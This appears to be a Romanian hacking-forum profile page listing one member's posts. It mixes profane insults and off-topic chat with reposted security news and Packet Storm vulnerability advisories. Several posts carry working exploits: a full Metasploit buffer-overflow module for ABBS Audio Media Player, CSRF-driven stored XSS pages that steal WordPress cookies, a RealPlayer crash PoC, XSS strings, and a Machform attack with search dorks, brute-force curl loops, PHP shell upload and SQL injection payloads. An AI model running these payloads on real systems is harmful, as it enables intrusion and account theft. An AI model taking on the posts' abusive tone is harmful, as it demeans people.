Jump to content

Matt

Active Members
 View Profile  See their activity

  • Posts

    1773

  • Joined

  • Last visited

  • Days Won

    6

 Content Type 

Everything posted by Matt

  1. Matt
    1.Nu mi-a dat nimeni pm sa modific post-ul , l-am modificat pentru ca era prea rau si pareai nevinovat. 2.Nu stii sa creezi un topic. 3.Ma doare in pula de tine vii si cersesti pe forum pui o arhiva suspecta.De erai baiat destept imediat dupa ce am postat eu stateai si explicai ce si cum dar tu cum esti un analfabet de nici nu stii sa bati la tastatura nu ai cum domnule. 4.Mori. //Byte-ul : Da-i programul , nu ii arata ca si tu esti la fel ca el.Fa un gest nobil si trimite-i programul.Poate si-a invatat lectia.
  2. Matt
    Mars ma ratatule , tu crezi ca eu iti inghit tie toate astea? Pis-amas pe voi de copii ratati care visati programe noaptea.Mori in mortii ma-tii.
  3. Matt
    Chrome este foarte bun insa tot Chrome colecteaza si cele mai multe date despre tine , deci o suge.
  4. Matt
    //
  5. Matt

    Epic

    Matt replied to Wish3r's topic in Cosul de gunoi

    Ba dar sunteti ratati ? Ati luat toti pula cu ghostul pulii ? E al treilea topic creat special pentru un idiot. Nu vedeti ca exagerati?
  6. Matt
    Vreau si eu varianta la matematica de M2. Am dat bacalaureatul acum 2 ani , insa azi noapte am visat ca dadeam bac-ul din nou. lol ))
  7. Matt
    Description : Linksys versions EA2700, EA3500, E4200, EA4500 using lighttpd 1.4.28 and Utopia on Linux 2.6.22 suffer from an unauthenticated access vulnerability. Author : Kyle Lovett Source : Linksys EA2700 / EA3500 / E4200 / EA4500 Unauthenticated Access ? Packet Storm Code : Vulnerable products : Linksys EA2700, EA3500, E4200, EA4500 using lighttpd 1.4.28 and Utopia on Linux 2.6.22 Firmware Version: 1.0.14 EA2700 Firmware Version: 1.0.30 EA3500 Firmware Version: 2.0.36 E4200 Firmware Version: 2.0.36 EA4500 Impact: - Major Timeline: - Still awaiting word back from Linksys support. Partial disclosure at the present due to the impact; Full disclosure in near future if warranted. Vulnerabilities: - Unauthenticated remote access to all pages of the router administration GUI, bypassing any credential prompts under certain common configurations (see below) - Direct access to several other critical files, unauthenticated as well Vulnerability Conditions seen in all variations: - Remote Management - Disabled - UPnP - Enabled - IPv4 SPI Firewall Protection - Disabled Although not the same symptoms as the bug that plagues most ASUS routers that are AiCloud enabled with WebDav, the utilization of both UPnP and SSL on lighttpd v 1.4.28 appears to be an extremely problematic combination, exposing certain vulnerabilities to the WAN side of the router. Recommendations- - Disable UPnP - Enable at minimum the built in IPv4 SPI firewall - Oddly, in some instances, resetting the password and doing a full power down reboot has shown to close the vulnerability, but not always - Disallow remote access from the WAN side - both http and https - Changing the default user name and password won't help in this case, but it always bears repeating - Since an attacker has access to enable FTP service, USB drives mounted in the router should be removed until a patch is out, or the full scope of the issue is known Testing additional firmware is ongoing.
  8. Matt
    Colaborarea malware reprezinta una dintre cele mai recente tehnici utilizate de catre atacatorii cibernetici pentru a se asigura ca programele lor malware nu pot fi inlaturate de pe computerele infectate, a informat Microsoft. Centrul de Protectie Malware (MMPC) al companiei a constatat ca familiile de malware Vobfus si Beebone se actualizeaza reciproc in mod constant cu noi variante, pentru a le face mai reziste in fata produselor antivirus. "Produsele antivirus actualizate pot detecta o varianta prezenta pe sistem; cu toate acestea, variantele nou downloadate ar putea sa nu fie detectate imediat", a scris Hyun Choi intr-un blog post MMPC. O familie tipica de malware care se auto-actualizeaza poate fi remediata odata ce este detectata insa odata scoasa din sistem, aceasta nu mai poate descarca versiuni noi. Cu toate acestea, in cazul Vobfus, chiar daca malware-ul este detectat si remediat, acesta se poate sa fi descarcat, anterior, un Beebone nedetectat, care, la randul sau, poate descarca o varianta nedetectata de Vobfus, a explicat Choi. In general, masina este infectata cu Vobfus prin intermediul removable-media ori unitatilor mapate. Vobfus contacteaza, apoi, centrul sau de comanda si control pentru a primi instructiuni pentru descarcarea unui Beebone pe aceeasi massina. In acelasi timp, Vobus infecteaza alte unitati removable-media si unitati mapate. In a treia etapa, Beebone contacteaza centrul sau de comanda si control pentru a primi instructiuni pentru a descarca actualizari si variante Vobfus, precum si alte programe malware. In cele din urma, noua varianta Vobfus descarca noi variante Beebbone si, simultan, infecteaza unitatile removable-media si unitatile mapate. Pentru a preveni preluarea controlului asupra computerelor de catre Vobfus si Beebone, Microsoft recomanda precautia la accesarea link-urilor externe si pastrarea browserelor si a altor programe software actualizate. Deoarece Vobfus este descarcat, initial, de catre Beebone si se raspandeste prin intermediul unitatilor movibile, o posibila metoda pentru prevenirea infectarii cu malware este dezactivarea functiei autorun, a precizat Choi. Sursa : ComputerWeekly.com | Information Technology (IT) News, UK IT Jobs, Industry News
  9. Matt
    Japonia a cerut explicatii Statelor Unite in urma aparitiei unor informatii potrivit carora ar fi fost spionata in cadrul programului PRISM al Agentiei Nationale de Securitate (NSA). "In prezent, suntem in curs de a solicita confirmari adecvate" informatiilor difuzate duminica de cotidianul britanic The Guardian, a anuntat marti secretarul general al Guvernului, Yoshihide Suga, relateaza AFP. Potrivit unor documente transmise acestei publicatii de catre fostul consultant american Edward Snowden, Japonia ar fi facut parte din randul celor 38 de "tinte" supravegheate de NSA, alaturi de Franta, Italia si Grecia. Aceste informatii au fost publicate de presa britanica, dupa aparitia unor dezvaluiri in saptamanalul german Der Spiegel, care a afirmat, sambata, ca NSA a spionat birouri ale Uniunii Europene (UE), la Bruxelles, si misiunea diplomatica a UE, la Washington. "Ma abtin sa comentez in detaliu dialogul nostru diplomatic (cu Washingtonul), dar, desigur, suntem foarte interesati de acest caz", a continuat Suga. Dezvaluirile cu privire la un presupus program de spionaj al NSA au provocat furia unor tari europene, mai ales a Germaniei si Frantei, in momentul in care UE si Statele Unite urmeaza teoretic sa lanseze negocieri importante in vederea semnarii unui acord de liber-schimb transatlantic. Franta nu poate "accepta acest tip de comportament" care trebuie sa inceteze "imediat", a reactionat presedintele francez François Hollande, primul sef de stat care s-a exprimat categoric cu privire la suspiciunile de spionaj care planeaza asupra americanilor. "Deja avem suficiente elemente pentru a solicita explicatii", a adaugat el. In Germania, un purtator de cuvant al cancelarului Angela Merkel, Steffen Seibert, a apreciat ca Statele Unite vor trebui "sa restabileasca increderea" cu aliatii lor europeni. "Cred ca o discutie va avea loc in curand" intre presedintele american Barack Obama si cancelar pe aceasta tema, a precizat el. La randul lor, Belgia, Grecia si Austria au cerut explicatii Washingtonului. Reactia Japoniei, principalul aliat in regiune al Statelor Unite, cu care a semnat un tratat de aparare, pare moderata, in contextul in care premierul conservator Shinzo Abe face orice pentru a ameliora relatiile bilaterale, usor deteriorate pe parcursul a trei ani, in perioada 2009-2012, atunci cand Partidul Democrat din Japonia (PDJ, centru-stanga) se afla la putere. Peste 47.000 de americani sunt mobilizati in Japonia. Sursa Business24.Ro
  10. Matt
    Description : Real Player versions 16.0.2.32 and below suffer from a denial of service vulnerability Author : Akshaysinh Vaghela Source : Real Player 16.0.2.32 Resource Exhaustion ? Packet Storm Code : Title: ==== Real player resource exhaustion Vulnerability Credit: ====== Name: Akshaysinh Vaghela Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: ===== CVE-2013-3299 Date: ==== 2013-04-23 CL-ID: ==== CRD-2013-03 Vendor: ====== Real Networks creates products and services that make it easier for people to access and enjoy digital media on the devices and platforms they choose to use. Product: ======= Real Player: The first application that allows enables people to easily download online video, transfer it to a favorite device and share it with friends via Facebook and Twitter. Product link: http://in.real.com/?mode=rp Abstract: ======= Cyberoam Threat Research Labs discovered a Resource exhaustion Vulnerability in Real Player <= 16.0.2.32 . Report-Timeline: ============ 2013-04-23: Vendor notification 2013-05-23: Vendor's Last Response 2013-06-03: Notification Follow-up Date 2013-00-00: Vendor Fix/Patch 2013-06-04: Public Disclosure Affected Version: ============= Ver ( <= 16.0.2.32 ) Exploitation-Technique: =================== Network Severity Rating: =================== 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) Details: ======= Real Networks Real Player is prone to Resource exhaustion vulnerability. When processing specially crafted HTML file, Real Player uses a value from the file to control a loop operation. Real player fails to validate the value before using it, which leads to DoS / Crash. Caveats / Prerequisites: ====================== The attacker needs to entice victims to perform an action in order to exploit this vulnerability. Proof Of Concept: ================ http://i40.tinypic.com/2mg1gt3.jpg http://i39.tinypic.com/5phchx.png POC Exploit code: <html> <head> <script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); } } </script> </head> </html> Risk: ===== The security risk of the Resource exhaustion Vulnerability is estimated as High. Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Any modified copy or reproduction, including partially usages, of this file requires authorization from Cyberoam Vulnerability Research Team. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Cyberoam Vulnerability Research Team. The first attempt at contact will be through any appropriate contacts or formal mechanisms listed on the vendor Web site, or by sending an e-mail with the pertinent information about the vulnerability. Simultaneous with the vendor being notified, Cyberoam may distribute vulnerability protection filters to its customers' IPS devices through the IPS upgrades. If a vendor fails to respond after five business days, Cyberoam Vulnerability Research Team may issue a public advisory disclosing its findings fifteen business days after the initial contact. If a vendor response is received within the timeframe outlined above, Cyberoam Vulnerability Research Team will allow the vendor 6-months to address the vulnerability with a patch. At the end of the deadline if a vendor is not responsive or unable to provide a reasonable statement as to why the vulnerability is not fixed, the Cyberoam Vulnerability Research Team will publish a limited advisory to enable the defensive community to protect the user. We believe that by doing so the vendor will understand the responsibility they have to their customers and will react appropriately. Cyberoam Vulnerability Research Team will make every effort to work with vendors to ensure they understand the technical details and severity of a reported security flaw. If a product vendor is unable to, or chooses not to, patch a particular security flaw, Cyberoam Vulnerability Research Team will offer to work with that vendor to publicly disclose the flaw with some effective workarounds. Before public disclosure of a vulnerability, Cyberoam Vulnerability Research Team may share technical details of the vulnerability with other security vendors who are in a position to provide a protective response to a broader user base.
  11. Matt
    Description : This Metasploit module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding an .lst, allowing arbitrary code execution with the privileges of the user running the application. This Metasploit module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1. Author : Julian Ahrens Source : ABBS Audio Media Player .LST Buffer Overflow ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'ABBS Audio Media Player .LST Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding an .lst, allowing arbitrary code execution with the privileges of the user running the application . This module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Julian Ahrens', # Vulnerability discovery and PoC 'modpr0be <modpr0be[at]spentera.com>' # Metasploit module ], 'References' => [ [ 'OSVDB', '75096' ], [ 'EDB', '25204' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, }, 'Targets' => [ [ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe 'Offset' => 4108, } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 30 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']), ], self.class) end def exploit buffer = payload.encoded buffer << rand_text(target['Offset'] - (payload.encoded.length)) buffer << [target.ret].pack('V') file_create(buffer) end end
  12. Matt
    Description : WordPress versions 3.5.1 and below suffer from multiple cross site scripting vulnerabilities. Author : MustLive Source : WordPress 3.5.1 Cross Site Scripting ? Packet Storm Code : Hello list! These are Cross-Site Scripting vulnerabilities in WordPress. Which I've disclosed last week. At WordPress 3.5.2 release, WP developers mentioned about three holes as "security hardenings" (to decrease their importance and to make it looks like there were less fixed holes). One of these holes is "Cross-Site Scripting (XSS) when Editing Media". After I checked media editing functionality, I've found that it was not one hole, but two holes and these were persistent XSS. ------------------------- Affected products: ------------------------- Vulnerable are WordPress 3.5.1 and previous versions. ---------- Details: ---------- Cross-Site Scripting (WASC-08): These are persistent XSS vulnerabilities at page http://site/wp-admin/post.php?post=1&action=edit in parameters excerpt and content. For the attack it's needed to bypass protection against CSRF (to receive token _wpnonce, which can be done with using reflected XSS). WordPress 3.5.1 XSS-1.html <html> <head> <title>WordPress 3.5.1 XSS exploit (C) 2013 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/wp-admin/post.php" method="post"> <input type="hidden" name="_wpnonce" value="cbad9af0d3"> <input type="hidden" name="user_ID" value="1"> <input type="hidden" name="action" value="editpost"> <input type="hidden" name="post_author" value="1"> <input type="hidden" name="post_type" value="attachment"> <input type="hidden" name="post_ID" value="1"> <input type="hidden" name="excerpt" value="</textarea><script>alert(document.cookie)</script>"> <input type="hidden" name="save" value="Update"> </form> </body> </html> The code will execute just after sending request at the page http://site/wp-admin/post.php?post=1&action=edit and at subsequent visiting this page. WordPress 3.5.1 XSS-2.html <html> <head> <title>WordPress 3.5.1 XSS exploit (C) 2013 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/wp-admin/post.php" method="post"> <input type="hidden" name="_wpnonce" value="cbad9af0d3"> <input type="hidden" name="user_ID" value="1"> <input type="hidden" name="action" value="editpost"> <input type="hidden" name="post_author" value="1"> <input type="hidden" name="post_type" value="attachment"> <input type="hidden" name="post_ID" value="1"> <input type="hidden" name="content" value="</textarea><script>alert(document.cookie)</script>"> <input type="hidden" name="save" value="Update"> </form> </body> </html> The code will execute just after sending request at the page http://site/wp-admin/post.php?post=1&action=edit and at subsequent visiting this page or the page http://site/page_name/attachment/1/. ------------ Timeline: ------------ 2013.06.21 - released WordPress 3.5.2. 2013.06.29 - disclosed at my site (http://websecurity.com.ua/6616/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
  13. Matt
    In topicul ala s-a vorbit despre limba romana.Nu se poate vorbi tot acolo si despre geografie / informatica / matematica ?? Trebuie alt topic ? Dupa ce ca moare forumul de foame mancand doar off-topic , daca facem cate un topic pentru fiecare materie , ce zici ajunge ca Dragusanca ?
  14. Matt
    Ai topic in pula mea special pentru bacalaureat. https://rstforums.com/forum/70453-baaaac.rst Sper sa pici !
  15. Matt
    Author : Yashar shahinzadeh Source : Machform Form Maker 2 - Multiple Vulnerabilities Code : ########################################################################################### # Exploit Title: Machform form maker - Multiple Vulnerabilities # Date: 2013 17 June # Exploit Author: Yashar shahinzadeh # Credit goes for: ha.cker.ir # Vendor Homepage: http://www.appnitro.com # Tested on: Linux & Windows, PHP 5.2.9 # Affected Version : 2 # Special thanks to: Mormoroth # Dork1: "Powered by MachForm" id= # Dork2: formularios/view.php?id= # Dork3: inurl:machform/view.php?id= # # Demonstration clip: http://y-shahinzadeh.ir/tutorial/machform.rar # Contacts: { http://Twitter.com/YShahinzadeh , http://Twitter.com/Mormoroth } ########################################################################################### Summary: ======== 1. Arbitrary file upload 2. MySQL Injection (Error based) and XSS 1. Arbitrary file upload: ========================= ... ... if(!empty($uploaded_files)){ foreach ($uploaded_files as $element_name){ if(empty($form_review)){ //move file and check for invalid file $destination_file = $input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}"; if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) { $filename = mysql_real_escape_string($_FILES[$element_name]['name']); $query = "update ap_form_{$form_id} set $element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'"; do_query($query); } }else{ //for form with review enabled, append .tmp suffix to all uploaded files //move file and check for invalid file $destination_file = $input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}.tmp"; if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) { $filename = mysql_real_escape_string($_FILES[$element_name]['name']); $query = "update ap_form_{$form_id}_review set $element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'"; do_query($query); } if(!empty($uploaded_file_lookup[$element_name])){ unset($uploaded_file_lookup[$element_name]); } } } } ... ... Exploit: In beginning, the hacker must aim view.php located at the root of site, observing the lines inside of mentioned file would be a big lead to disclosure of vulnerability: $input_array = ap_sanitize_input($_POST); $submit_result = process_form($input_array); These two lines have functions leading to have both MySQL injection and Arbitrary file upload vulnerability. I’m not going to audit codes, I may just illustrate the attack started by applying brute-force procedure on ID parameter so as to find a form consisting file upload form, it can be achieved by any program, I just issued a Linux command helped me find it properly: seq 1 500 | xargs -I XX -P32 curl -s http://target/view.php=XX -o XX.out grep “type=\”file\”" *.out Afterwards, an HTML element followed by “for=”(.*)” must be specified, picture below gives better concept: http://blog.y-shahinzadeh.ir/posts-images/machform/7.jpg All have to be done is uploading PHP shell, and trying to find its name on server. The file will be uploaded in the path: http://target.com/data/form_[ID]/[element name]-[mysql_insert_id()].php In URL above, [ID] is gathered in brute-force phase, [element name] is gathered by viewing HTML source, and [mysql_insert_id()] should be brute-forced again. Being relatively difficult, I’ve recorded a clip demonstrating what I’ve said: http://y-shahinzadeh.ir/tutorial/machform.rar 2. MySQL Injection (Error based) and XSS: ========================================= ... ... $input_array = ap_sanitize_input($_POST); ... ... Exploit (POST to view.php after finding HTML elements): element_1=1&element_2=’&element_3=1&form_id=11&submit=1 element_1=1&element_2=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28949236%29%3c%2fScRiPt%3e&element_3=1&form_id=11&submit=Enviar
  16. Matt
    Description : Ubuntu Security Notice 1894-1 - Timo Sirainen discovered that libcurl incorrectly handled memory when parsing URL encoded strings. An attacker could possibly use this issue to cause libcurl to crash, leading to a denial of service, or execute arbitrary code. Author : Ubuntu Source : Ubuntu Security Notice USN-1894-1 ? Packet Storm Code : ============================================================================ Ubuntu Security Notice USN-1894-1 July 02, 2013 curl vulnerability ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 13.04 - Ubuntu 12.10 - Ubuntu 12.04 LTS - Ubuntu 10.04 LTS Summary: libcurl could be made to crash or run programs as your login if it received specially crafted input. Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries Details: Timo Sirainen discovered that libcurl incorrectly handled memory when parsing URL encoded strings. An attacker could possibly use this issue to cause libcurl to crash, leading to a denial of service, or execute arbitrary code. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 13.04: libcurl3 7.29.0-1ubuntu3.1 libcurl3-gnutls 7.29.0-1ubuntu3.1 libcurl3-nss 7.29.0-1ubuntu3.1 Ubuntu 12.10: libcurl3 7.27.0-1ubuntu1.3 libcurl3-gnutls 7.27.0-1ubuntu1.3 libcurl3-nss 7.27.0-1ubuntu1.3 Ubuntu 12.04 LTS: libcurl3 7.22.0-3ubuntu4.2 libcurl3-gnutls 7.22.0-3ubuntu4.2 libcurl3-nss 7.22.0-3ubuntu4.2 Ubuntu 10.04 LTS: libcurl3 7.19.7-1ubuntu1.3 libcurl3-gnutls 7.19.7-1ubuntu1.3 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1894-1 CVE-2013-2174 Package Information: https://launchpad.net/ubuntu/+source/curl/7.29.0-1ubuntu3.1 https://launchpad.net/ubuntu/+source/curl/7.27.0-1ubuntu1.3 https://launchpad.net/ubuntu/+source/curl/7.22.0-3ubuntu4.2 https://launchpad.net/ubuntu/+source/curl/7.19.7-1ubuntu1.3
  17. Matt
    Description : XML-Sitemaps.com Sitemap Generator version 6.0 suffers from a cross site scripting vulnerability. Author : Christy Philip Mathew Source : XML-Sitemaps.com Sitemap Generator 6.0 Cross Site Scripting ? Packet Storm Code : # XML-Sitemaps.com Sitemap Generator # Date: 2nd July 2013 # Author: Christy Philip Mathew (www.offcon.org) # Vendor or Software Link: http://www.xml-sitemaps.com/generator-demo/ # Version : 6.0 *XSS Vulnerability * (a) Configuration > Miscellaneous Settings > Send email notifications: Update the email to a@a.com"><img src=x onerror=prompt(0);> ( Update the URL input box with http://site.com"><img src=x onerror=prompt(/XSS/);> Screenshot Attached All the Best *Christy Philip Mathew* Information Security Researcher Twitter: @christypriory
  18. Matt
    Description : The Skype for Android application appears to have a bug which permits the Android lockscreen (ie. pattern, PIN, password) to be bypassed relatively easily, if the device is logged into Skype, and the "attacker" is able to call the "victim" on Skype. Author : Pulser Source : Skype Android Lockscreen Bypass ? Packet Storm Code : Tested with Skype version 3.2.0.6673 (released 1st July 2013) on various Android devices (Sony Xperia Z, Samsung Galaxy Note 2, Huawei Premia 4G The Skype for Android application appears to have a bug which permits the Android inbuilt lockscreen (ie. pattern, PIN, password) to be bypassed relatively easily, if the device is logged into Skype, and the "attacker" is able to call the "victim" on Skype. This can be reproduced as follows with 2 Skype accounts, and 2 separate devices to use with Skype. The target phone is presumed to have an Android lockscreen configured and in use, and to be locked during the test. 1. Initiate a Skype call to the target device, which will cause it to wake, ring, and display a prompt on the screen to answer or reject the call 2. Accept the call from the target device using the green answer button on the screen 3. End the call from the initiating device (ie. the device used to call the target phone) 4. The target device will end the call, and should display the lockscreen. 5. Turn off the screen of the target device using the power key, and turn it on again 6. The lockscreen will now be bypassed. It will remain bypassed until the device is rebooted Similar to (ironically enough): http://arstechnica.com/security/2013/04/crital-app-flaw-bypasses-screen-lock-on-up-to-100-million-android-phones/. Seems that internet based calling apps might well be "unlucky". Thanks to Emilio López for originally bringing this to my attention
  19. Matt

    *|Bercy|*

    Matt replied to robercy's topic in Bine ai venit

    * | : Este specifica cauntar straicarilor , metinarilor etc. Bine ai venit.
  20. Matt
    Description : WinAmp version 5.63 suffers from a stack-based buffer overflow vulnerability. The application loads the directories in %PROGRAMFILES%\WinAmp\Skins on startup to determine the skins that have been installed and to list them in the application menu point "Skins" and in the Skins Browser. But the application does not properly validate the length of the directory name before passing it as argument to a lstrcpynW call in the library gen_jumpex.dll, which leads to a buffer overflow condition with possible code execution. Author : Julien Ahrens Source : WinAmp 5.63 Buffer Overflow ? Packet Storm Code : Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: WinAmp Vendor URL: www.winamp.com Type: Stack-based Buffer Overflow [CWE-121] Date found: 2013-06-05 Date published: 2013-07-01 CVSSv2 Score: Bug #1: 7,5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) Bug #2: 3,7 (AV:L/AC:H/Au:N/C:P/I:P/A:P) CVE: CVE-2013-4694 2. CREDITS ---------- These vulnerabilities were discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- WinAmp v5.63, older versions may be affected too. 4. VULNERABILITY DESCRIPTION (BUG #1) ------------------------------------- The application loads the directories in %PROGRAMFILES%\WinAmp\Skins on startup to determine the skins that have been installed and to list them in the application menu point "Skins" and in the Skins Browser. But the application does not properly validate the length of the directory name before passing it as argument to a lstrcpynW call in the library gen_jumpex.dll, which leads to a buffer overflow condition with possible code execution. This flaw is also exploitable via the %APPDATA%\WinAmp\winamp.ini. The application loads the contents on startup, but does not properly validate the length of the string loaded from the "skin" key before passing it as an argument to the same lstrcpynW call in the library gen_jumpex.dll, which leads to the same buffer overflow condition. An attacker either needs to trick the victim to download and apply an arbitrary skin package in order to exploit the vulnerability or to copy an arbitrary winamp.ini into the %APPDATA%\WinAmp directory. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition. 4. VULNERABILITY DESCRIPTION (BUG #2) ------------------------------------- The application loads the string of the GUI "Search" field from the "WinAmp Library" when entered by a user and after switching to another menu point, but does not properly validate the length of the string before passing it as an argument to a GetDlgItemTextW call in the library ml_local.dll, which leads to a buffer overflow condition with possible code execution. An attacker needs local access to the client in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition. 5. PROOF-OF-CONCEPT (DEBUG) (Bug #1) ------------------------------------ Registers: EAX 3B3C08EB ECX 7C80BAFC kernel32.7C80BAFC EDX 00430010 winamp.00430010 EBX 0000007E ESP 00C1F290 UNICODE "CCCCCCCCCCCCCCCCCCCCCCCCCCCC" EBP 00430043 winamp.00430043 ESI 001961E8 EDI 0000060B EIP 00430060 winamp.00430060 C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 1 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDE000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_INVALID_WINDOW_HANDLE (00000578) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty +NaN ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 0120 Cond 0 0 0 1 Err 0 0 1 0 0 0 0 0 (LT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 Stackview: ESP-20 > 00430043 CC winamp.00430043 ESP-1C > 0043004B KC winamp.0043004B ESP-18 > 7C80BAFC kernel32.7C80BAFC ESP-14 > 00430043 CC winamp.00430043 ESP-10 > 00430043 CC winamp.00430043 ESP-C > 00430043 CC winamp.00430043 ESP-8 > 00430043 CC winamp.00430043 ESP-4 > 00430043 CC winamp.00430043 ESP ==> > 00430043 CC winamp.00430043 ESP+4 > 00430043 CC winamp.00430043 ESP+8 > 00430043 CC winamp.00430043 ESP+C > 00430043 CC winamp.00430043 ESP+10 > 00430043 CC winamp.00430043 ESP+14 > 00430043 CC winamp.00430043 ESP+18 > 00430043 CC winamp.00430043 ESP+1C > 00430043 CC winamp.00430043 ESP+20 > 00430043 CC winamp.00430043 Vulnerable code part: .text:1001A5B8 push eax ; lpString2 .text:1001A5B9 lea eax, [ebp+String1] .text:1001A5BF push eax ; lpString1 .text:1001A5C0 call ds:lstrcpynW .text:1001A5C6 cmp word ptr [ebp+wParam], si .text:1001A5CD jnz short loc_1001A5E2 .text:1001A5CF mov dword_100310B4, 1 .text:1001A5D9 cmp [ebp+String1], si .text:1001A5E0 jz short loc_1001A5E8 .text:1001A5E2 .text:1001A5E2 loc_1001A5E2: ; CODE XREF: sub_1001A551+7Cj .text:1001A5E2 mov dword_100310B4, esi .text:1001A5E8 .text:1001A5E8 loc_1001A5E8: ; CODE XREF: sub_1001A551+8Fj .text:1001A5E8 pop esi .text:1001A5E9 leave .text:1001A5EA retn .text:1001A5EA sub_1001A551 endp 5. PROOF-OF-CONCEPT (DEBUG) (Bug #2) ------------------------------------ Registers: EAX 00000000 ECX 079A9D68 ml_local.079A9D68 EDX 00380608 EBX 00000000 ESP 00C1E46C UNICODE "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" EBP 00430043 winamp.00430043 ESI 00000000 EDI 00000000 EIP 00430043 winamp.00430043 C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 1 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDE000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_INVALID_WINDOW_HANDLE (00000578) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 Stackview: ESP-20 > 00430043 CC winamp.00430043 ESP-1C > 00430043 CC winamp.00430043 ESP-18 > 00430043 CC winamp.00430043 ESP-14 > 00430043 CC winamp.00430043 ESP-10 > 00430043 CC winamp.00430043 ESP-C > 00430043 CC winamp.00430043 ESP-8 > 00430043 CC winamp.00430043 ESP-4 > 00430043 CC winamp.00430043 ESP ==> > 00430043 CC winamp.00430043 ESP+4 > 00430043 CC winamp.00430043 ESP+8 > 00430043 CC winamp.00430043 ESP+C > 00430043 CC winamp.00430043 ESP+10 > 00430043 CC winamp.00430043 ESP+14 > 00430043 CC winamp.00430043 ESP+18 > 00430043 CC winamp.00430043 ESP+1C > 00430043 CC winamp.00430043 ESP+20 > 00430043 CC winamp.00430043 Vulnerable code part: .text:07990871 lea eax, [ebp+WideCharStr] .text:07990877 push eax ; lpString .text:07990878 push 3EEh ; nIDDlgItem .text:0799087D push [ebp+hDlg] ; hDlg .text:07990880 call ds:GetDlgItemTextW .text:07990886 lea eax, [ebp+WideCharStr] [...] .text:0799097C mov dword_79A9D68, eax .text:07990981 mov dword_79A9D70, eax .text:07990986 mov dword_79A9D6C, eax .text:0799098B mov dword_79ACB54, eax .text:07990990 pop ebx .text:07990991 leave .text:07990992 retn 6. SOLUTION ----------- Update to latest version v5.64 or newer. 7. REPORT TIMELINE ------------------ 2013-06-05: Discovery of the vulnerability 2013-06-06: Vendor acknowledgement of the issue 2013-06-11: Vendor already fixed this issue in v5.7 Beta build 3403 2013-06-12: Confirmation that the issue is fixed 2013-06-19: Vendor releases v5.64 which includes the fix 2013-07-01: Coordinated Disclosure 8. REFERENCES ------------- http://security.inshell.net http://forums.winamp.com/showthread.php?t=364291
  21. Matt
